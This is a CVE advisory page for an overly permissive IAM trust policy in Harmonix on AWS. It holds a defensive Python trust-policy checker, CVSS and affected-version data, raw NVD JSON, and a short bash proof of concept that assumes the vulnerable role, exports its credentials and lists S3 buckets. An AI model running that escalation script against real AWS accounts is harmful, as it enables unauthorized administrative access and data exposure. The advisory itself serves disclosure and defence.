Security Vulnerability Report

CVE-2025-14503 (CVSS 7.2, HIGH)

Published: 2025-12-15 20:15:49
Last Modified: 2026-01-30 17:02:34
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

An overly-permissive IAM trust policy in the Harmonix on AWS framework may allow IAM principals in the same AWS account to escalate privileges via role assumption. The sample code for the EKS environment provisioning role is configured to trust the account root principal, which may enable any IAM principal in the same AWS account with sts:AssumeRole permissions to assume the role with administrative privileges. We recommend customers upgrade to Harmonix on AWS v0.4.2 or later if you have deployed the framework using versions v0.3.0 through v0.4.1.
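The weakness described above is a trust-policy shape, not a code bug: a role whose trust policy names the account root principal (`arn:aws:iam::<account-id>:root`, or the bare account id) as an allowed `sts:AssumeRole` principal can be assumed by any principal in that account whose own identity policy grants `sts:AssumeRole` on the role ARN. The following is an added example, not code from the Harmonix project or the advisory: a small static check that flags such statements in a trust policy document, shown against three constructed policies (a root-trusting one modelled on the description, one narrowed to a single hypothetical pipeline role, and one that keeps the root principal but scopes it with an `aws:PrincipalArn` condition). The role names and the account id 123456789012 are placeholders; the actual fix shipped in Harmonix v0.4.2 is not reproduced here.

```python
"""Static check for overly permissive IAM role trust policies.

Added example (not Harmonix or AWS code). It flags trust-policy statements
that let every principal in an AWS account assume the role, which is the
condition CVE-2025-14503 describes for the EKS provisioning role sample.
"""
import json
import re

# sts:AssumeRole, or wildcards that cover it.
ASSUME_ACTIONS = {"sts:assumerole", "sts:*", "*"}
ROOT_PRINCIPAL = re.compile(r"^arn:aws:iam::\d{12}:root$")
ACCOUNT_ID = re.compile(r"^\d{12}$")  # a bare account id means the same as the root ARN
# Condition keys that narrow *who* may assume the role (rather than how).
PRINCIPAL_CONDITION_KEYS = {"aws:principalarn", "aws:principaltag", "sts:externalid"}


def _as_list(value):
    """IAM allows scalars or lists in most policy fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _has_principal_condition(stmt: dict) -> bool:
    """True if any Condition block restricts the calling principal."""
    for condition_keys in stmt.get("Condition", {}).values():
        for key in condition_keys:
            if key.lower() in PRINCIPAL_CONDITION_KEYS:
                return True
    return False


def find_permissive_statements(trust_policy: dict) -> list[str]:
    """Return one finding per Allow statement that lets a whole account assume the role."""
    findings = []
    for idx, stmt in enumerate(_as_list(trust_policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if not actions & ASSUME_ACTIONS:
            continue
        principal = stmt.get("Principal")
        # Principal may be the literal "*" or a map with an "AWS" entry.
        aws_principals = ["*"] if principal == "*" else _as_list((principal or {}).get("AWS"))
        broad = [p for p in aws_principals
                 if p == "*" or ROOT_PRINCIPAL.match(p) or ACCOUNT_ID.match(p)]
        if broad and not _has_principal_condition(stmt):
            findings.append(f"statement {idx} ({stmt.get('Sid', 'no Sid')}): trusts "
                            f"{', '.join(broad)} with no principal-narrowing Condition")
    return findings


def load_trust_policy(text: str) -> dict:
    """Accept either a bare trust-policy document or `aws iam get-role` JSON output."""
    doc = json.loads(text)
    return doc.get("Role", {}).get("AssumeRolePolicyDocument", doc)


# --- constructed sample policies (placeholders, not the project's real documents) ---
WEAK_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AllowAccountRoot",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
        "Action": "sts:AssumeRole",
    }],
}

HARDENED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AllowOnlyProvisioningPipeline",
        "Effect": "Allow",
        # Hypothetical role name: trust one specific caller instead of the whole account.
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/harmonix-provisioning-pipeline"},
        "Action": "sts:AssumeRole",
    }],
}

SCOPED_ROOT_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "RootButScopedByPrincipalArn",
        "Effect": "Allow",
        "Principal": {"AWS": "123456789012"},
        "Action": "sts:AssumeRole",
        # Root principal kept, but only callers matching this ARN pattern may assume.
        "Condition": {"ArnLike": {"aws:PrincipalArn": "arn:aws:iam::123456789012:role/harmonix-*"}},
    }],
}

if __name__ == "__main__":
    for name, policy in [("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY),
                         ("scoped-root", SCOPED_ROOT_TRUST_POLICY)]:
        print(name, find_permissive_statements(policy) or "no findings")
```

To review a deployed role, pipe `aws iam get-role --role-name <name>` into `load_trust_policy` and pass the result to `find_permissive_statements`; the CLI returns the trust policy already decoded under `Role.AssumeRolePolicyDocument`. Remember that a root principal is not wrong in itself: it delegates the decision to identity policies in the account, so the finding means "every principal with `sts:AssumeRole` on this ARN can get these permissions", which is exactly the exposure the advisory describes.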

CVSS Details

CVSS v3.1 Score: 7.2
Severity: HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0 Score (from the raw record below): 8.6 HIGH
Weakness: CWE-266

Configurations (Affected Products)

cpe:2.3:a:amazon:harmonix:*:*:*:*:*:aws:*:* - VULNERABLE
Harmonix on AWS v0.3.0
Harmonix on AWS v0.3.1
Harmonix on AWS v0.3.2
Harmonix on AWS v0.3.3
Harmonix on AWS v0.3.4
Harmonix on AWS v0.4.0
Harmonix on AWS v0.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```bash
#!/bin/bash
# CVE-2025-14503 PoC - IAM Privilege Escalation via Role Assumption
# Prerequisites: valid AWS credentials with sts:AssumeRole permission in the same account
TARGET_ROLE_ARN="arn:aws:iam::123456789012:role/harmonix-eks-provisioning-role"
SESSION_NAME="attacker-session-$(date +%s)"

# Step 1: Assume the target role with administrative privileges
echo "[+] Attempting to assume target role: $TARGET_ROLE_ARN"
if CREDS=$(aws sts assume-role \
    --role-arn "$TARGET_ROLE_ARN" \
    --role-session-name "$SESSION_NAME" \
    --duration-seconds 3600); then
  echo "[+] Successfully assumed role!"

  # Step 2: Extract the temporary credentials from the STS response
  AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r '.Credentials.AccessKeyId')
  AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r '.Credentials.SecretAccessKey')
  AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r '.Credentials.SessionToken')
  export AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN

  # Step 3: Verify privilege escalation
  echo "[+] Verifying escalated privileges..."
  aws iam simulate-principal-policy \
    --policy-source-arn "$TARGET_ROLE_ARN" \
    --action-names "*" \
    --resource-arns "*"

  # Step 4: List S3 buckets or other sensitive resources
  echo "[+] Listing S3 buckets with escalated privileges..."
  aws s3 ls
  echo "[+] Privilege escalation successful! Full AWS access obtained."
else
  echo "[-] Failed to assume role. Check permissions."
fi
```

References

https://aws.amazon.com/security/security-bulletins/AWS-2025-031/ (Patch, Vendor Advisory)
https://github.com/awslabs/harmonix/pull/189 (Issue Tracking)
https://github.com/awslabs/harmonix/security/advisories/GHSA-qm86-gqrq-mqcw (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-14503", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-15T20:15:49.190", "lastModified": "2026-01-30T17:02:34.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An overly-permissive IAM trust policy in the Harmonix on AWS framework may allow IAM principals in the same AWS account to escalate privileges via role assumption. The sample code for the EKS environment provisioning role is configured to trust the account root principal, which may enable any IAM principal in the same AWS account with sts:AssumeRole permissions to assume the role with administrative privileges.\n\n\nWe recommend customers upgrade to Harmonix on AWS v0.4.2 or later if you have deployed the framework using versions v0.3.0 through v0.4.1."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:harmonix:*:*:*:*:*:aws:*:*", "versionStartIncluding": "0.3.0", "versionEndExcluding": "0.4.2", "matchCriteriaId": "DB22DB4B-8396-4C5E-9346-3E20EE111E99"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-031/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/awslabs/harmonix/pull/189", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Issue Tracking"]}, {"url": "https://github.com/awslabs/harmonix/security/advisories/GHSA-qm86-gqrq-mqcw", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}
```